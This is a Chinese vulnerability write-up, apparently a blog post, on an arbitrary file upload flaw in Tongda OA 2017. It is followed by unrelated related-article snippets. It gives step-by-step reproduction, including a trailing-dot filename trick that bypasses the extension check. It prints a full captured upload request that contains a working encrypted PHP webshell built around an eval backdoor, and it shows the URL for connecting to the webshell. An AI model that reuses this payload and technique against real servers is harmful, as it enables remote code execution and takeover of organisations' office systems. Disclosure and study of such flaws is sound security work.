漏洞挖掘之通达OA2017任意文件上传

简介: 漏洞挖掘之通达OA2017任意文件上传

关于通达OA

通达OA系统代表了协同OA的先进理念,16年研发铸就成熟OA产品,协同OA软件行业唯一央企团队研发,多次摘取国内OA软件金奖,拥有2万多家正式用户,8万多家免费版用户

通达官网链接:https://www.tongda2000.com/

影响版本:MYOA2017

漏洞:用户可以通过上传任意文件到服务器中,并且可以借助上传的文件利用shell工具直接获得system权限。主要是因为通达OA未对用户上传的文件进行校验,因为windows系统会对文件名最后的.忽略,最后导致了该上传漏洞。比如:1.php. 到了win上之后就会变成1.php

本地复现

下载MYOA2017.exe按照默认选项安装好之后目录如下:

2.  本地按照默认80端口访问该OA:

3. 使用本地的默认账号admin和空密码进入:(实例的时候参考使用通达OA前台任意用户登录漏洞https://mp.weixin.qq.com/s/mY07eR6OnbRueGcITgxb7A进入后台)

4. 选择:快捷菜单—>个人文件柜—>选择新建文件,开始新建文件

5. 选择本地上传图片:

6. 上传脚本shell.jpg开始上传Burpsuite抓包,抓包数据如下:

POST /module/upload/upload.php?encode=utf-8 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
X_Requested_With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------26422785422981
Content-Length: 1373
DNT: 1
Connection: close
Referer: http://localhost/module/ueditor/dialogs/image/image.html
Cookie: USER_NAME_COOKIE=admin; OA_USER_ID=admin; SID_1=591f5e0c; PHPSESSID=0bboeic38v9e7pvjqee3ns5gb5
-----------------------------26422785422981
Content-Disposition: form-data; name="id"
WU_FILE_0
-----------------------------26422785422981
Content-Disposition: form-data; name="name"
shell.jpg
-----------------------------26422785422981
Content-Disposition: form-data; name="type"
image/jpeg
-----------------------------26422785422981
Content-Disposition: form-data; name="lastModifiedDate"
2020/8/5 下午11:35:58
-----------------------------26422785422981
Content-Disposition: form-data; name="size"
650
-----------------------------26422785422981
Content-Disposition: form-data; name="file"; filename="shell.jpg"
Content-Type: image/jpeg
<?php
@error_reporting(0);
session_start();
if (isset($_GET['pass']))
{
    $key=substr(md5(uniqid(rand())),16);
    $_SESSION['k']=$key;
    print $key;
}
else
{
    $key=$_SESSION['k'];
    $post=file_get_contents("php://input");
    if(!extension_loaded('openssl'))
    {
        $t="base64_"."decode";
        $post=$t($post."");
        for($i=0;$i<strlen($post);$i++) {
                 $post[$i] = $post[$i]^$key[$i+1&15]; 
                }
    }
    else
    {
        $post=openssl_decrypt($post, "AES128", $key);
    }
    $arr=explode('|',$post);
    $func=$arr[0];
    $params=$arr[1];
    class C{public function __construct($p) {eval($p."");}}
    @new C($params);
}
?>
-----------------------------26422785422981--


7. 将文件名修改为:shell.php.,因为在win下不允许文件名最后的后缀是.的形式,所以win下会自动将点进行消除。

8.  得到返回包数据,并将数据进行拼接,得到url链接地址:


http://localhost/upload_temp/2008/798316902.shell.php


9.  访问该地址:

10. 菜刀连接:

因为这个后来提交到了cnvd,所以当时找到很多的互联网案例:

提交CNVD之后:

相关文章
|
JSON 监控 安全
通达OA任意文件上传漏洞详细分析
通达OA任意文件上传漏洞详细分析
阿里云推出“通达云OA”办公系统 基于钉钉的移动OA应用
"通达云OA"是一款基于钉钉的移动OA应用。提供了通用的业务流程审批、考勤打卡、会议管理等功能。
3201 0
|
关系型数据库 数据库 数据安全/隐私保护
修改通达OA Mysql数据库密码
有的用户,出于使用mysql数据库开发其他程序的需要,可能希望修改Mysql数据库的root用户密码, 现做以下简要说明。
1532 0
|
27天前
|
安全 搜索推荐 数据安全/隐私保护
点晴免费OA办公系统:高效协同,安全易用
信息技术发展推动企业信息化,即企业利用现代技术提升生产、经营、管理效率,增强竞争力。点晴免费OA系统作为信息化管理的基础,是实现企业信息化的关键手段。
33 2
|
2月前
|
数据安全/隐私保护
点晴OA办公系统让企业变得高效协同
随着企业信息化进程的加快,很多企业开始寻求使用企业管理免费OA办公系统来提高工作效率。然而,有些些企业可能缺乏信息化经验,对技术一无所知,甚至从未接触过OA办公系统。在这种情况下,企业需要寻求功能比较全面的OA办公系统,以满足企业的实际需求。
48 1
|
2月前
|
敏捷开发 数据可视化 数据挖掘
哪些OA任务管理系统值得推荐?4款高效办公工具介绍
在现代企业中,OA(办公自动化)任务管理系统是提升工作效率和团队协作的关键工具。本文介绍了4款备受推崇的OA任务管理系统:板栗看板、Trello、Asana和Monday.com,分别从提高工作效率、增强团队协作、优化资源分配和提升工作质量等方面进行了详细说明,为用户提供全面的参考和选择指南。
|
2月前
|
存储 安全 数据安全/隐私保护
如何明智选择免费OA系统的关键因素
在数字化办公日益普及的今天,选择一款合适的免费OA系统对于企业提升工作效率和管理水平至关重要。不管是办公的便捷方便,还是与其他平台的融合,免费OA系统的选择,需要看这几点,易用性、开放性、稳定性、服务性、实用性、安全性。
23 0